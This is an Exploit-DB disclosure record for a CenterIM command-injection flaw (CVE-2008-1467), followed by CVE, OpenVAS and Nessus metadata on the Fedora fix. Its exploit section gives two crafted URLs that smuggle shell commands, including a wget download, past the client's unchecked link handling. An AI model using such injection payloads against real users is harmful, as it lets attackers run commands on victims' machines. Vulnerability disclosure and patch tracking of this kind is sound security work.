ID EDB-ID:5283 Type exploitdb Reporter Brian Fonfara Modified 2008-03-20T00:00:00
Description
CenterIM <= 4.22.3 Remote Command Execution Vulnerability. CVE-2008-1467. Remote exploit for linux platform
#######################################################################
Application: CenterIM
http://www.centerim.org/index.php/Main_Page
Versions: centerim <= 4.22.3
OS: Linux
Bug: Execution of shell commands
Exploit: remote
Date: 15 March 2008
Author: Brian Fonfara (w00)
eMail: brian.fonfara@gmx.de
Web: newb.kicks-ass.net
#######################################################################
1) Bug
2) Exploit
#######################################################################
=======
1) Bug
=======
Received URLs in the message window do not get checked for illegal
characters, like "\'", "\"", ";", "$", "{", "}", "&&" and "||"
#######################################################################
===========
2) Exploit
===========
Standard settings:
- Browser already open:
http://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'(
- New browser instance:
http://gidf.de/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de"
#######################################################################
Greets to: mrks
# milw0rm.com [2008-03-20]
{"hash": "7b6bf72b587cfcc720525d0464836df0ae4a98c75bccc501aaa06683aec9b36c", "id": "EDB-ID:5283", "lastseen": "2016-01-31T21:54:25", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/5283/", "description": "CenterIM <= 4.22.3 Remote Command Execution Vulnerability. CVE-2008-1467. Remote exploit for linux platform", "title": "CenterIM <= 4.22.3 - Remote Command Execution Vulnerability", "sourceData": "#######################################################################\n\nApplication: CenterIM\n http://www.centerim.org/index.php/Main_Page\nVersions: centerim <= 4.22.3\nOS: Linux\nBug: Execution of shell commands\nExploit: remote\nDate: 15 March 2008\nAuthor: Brian Fonfara (w00)\n eMail: brian.fonfara@gmx.de\n Web: newb.kicks-ass.net\n\n\n#######################################################################\n\n1) Bug\n2) Exploit\n\n\n#######################################################################\n\n=======\n1) Bug\n=======\n\nReceived URLs in the message window do not get checked for illegal\ncharacters, like \"\\'\", \"\\\"\", \";\", \"$\", \"{\", \"}\", \"&&\" and \"||\"\n\n#######################################################################\n\n===========\n2) Exploit\n===========\n\nStandard settings:\n- Browser already open:\nhttp://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'(\n\n- New browser instance:\nhttp://gidf.de/centerim\"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de\"\n\n#######################################################################\n\nGreets to: mrks\n\n# milw0rm.com [2008-03-20]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-1467"], "published": "2008-03-20T00:00:00", "osvdbidlist": ["43510"], "references": [], "reporter": "Brian Fonfara", "modified": "2008-03-20T00:00:00", "href": "https://www.exploit-db.com/exploits/5283/"}
{"result": {"cve": [{"id": "CVE-2008-1467", "type": "cve", "title": "CVE-2008-1467", "description": "** DISPUTED ** CenterIM 4.22.3 and earlier allows user-assisted remote attackers to execute arbitrary commands via shell metacharacters in a URI, related to \"received URLs in the message window.\" NOTE: this issue has been disputed due to the user-assisted nature, since the URL must be selected and launched by the victim.", "published": "2008-03-24T17:44:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1467", "cvelist": ["CVE-2008-1467"], "lastseen": "2017-09-29T14:25:49"}], "openvas": [{"id": "OPENVAS:860043", "type": "openvas", "title": "Fedora Update for centerim FEDORA-2008-2869", "description": "Check for the Version of centerim", "published": "2009-02-16T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=860043", "cvelist": ["CVE-2008-1467"], "lastseen": "2017-07-25T10:56:06"}, {"id": "OPENVAS:860677", "type": "openvas", "title": "Fedora Update for centerim FEDORA-2008-2867", "description": "Check for the Version of centerim", "published": "2009-02-16T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=860677", "cvelist": ["CVE-2008-1467"], "lastseen": "2017-07-25T10:57:13"}], "nessus": [{"id": "FEDORA_2008-2869.NASL", "type": "nessus", "title": "Fedora 7 : centerim-4.22.4-1.fc7.1 (2008-2869)", "description": "This update fixes the CVE-2008-1467 security issue by disabling the 'actions' configuration altogether. Furthermore the default web browser is no longer configurable in CenterIM. The links get open in the default web browser configured, using xdg-utils. There won't be any update for centericq. All users of centericq packages are advised to switch to centerim. In Fedora 7 centerim package provides symbolic link 'centericq' that points to centerim binary for compatibility with centericq. Note that centerim packages in later releases of Fedora no longer provide this. CenterIM will automatically use CenterICQ settings if ones are found in all releases of Fedora. This release adds support for new versions of Yahoo IM protocol. Unless you apply this update, you won't be able to use Yahoo IM after April 2nd 2008.\nPlease note: To avoid compatibility and confidentiality problems with an undocumented protocol transported unencrypted over third-party controlled network, all users of Yahoo IM protocol are encouraged to switch to open and free alternatives, such as XMPP used in Jabber network.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2008-04-04T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=31749", "cvelist": ["CVE-2008-1467"], "lastseen": "2017-10-29T13:39:31"}, {"id": "FEDORA_2008-2867.NASL", "type": "nessus", "title": "Fedora 8 : centerim-4.22.4-1.fc8 (2008-2867)", "description": "This update fixes the CVE-2008-1467 security issue by disabling the 'actions' configuration altogether. Furthermore the default web browser is no longer configurable in CenterIM. The links get open in the default web browser configured, using xdg-utils. This release adds support for new versions of Yahoo IM protocol. Unless you apply this update, you won't be able to use Yahoo IM after April 2nd 2008. Please note: To avoid compatibility and confidentiality problems with an undocumented protocol transported unencrypted over third-party controlled network, all users of Yahoo IM protocol are encouraged to switch to open and free alternatives, such as XMPP used in Jabber network.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2008-04-04T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=31747", "cvelist": ["CVE-2008-1467"], "lastseen": "2017-10-29T13:39:29"}]}}
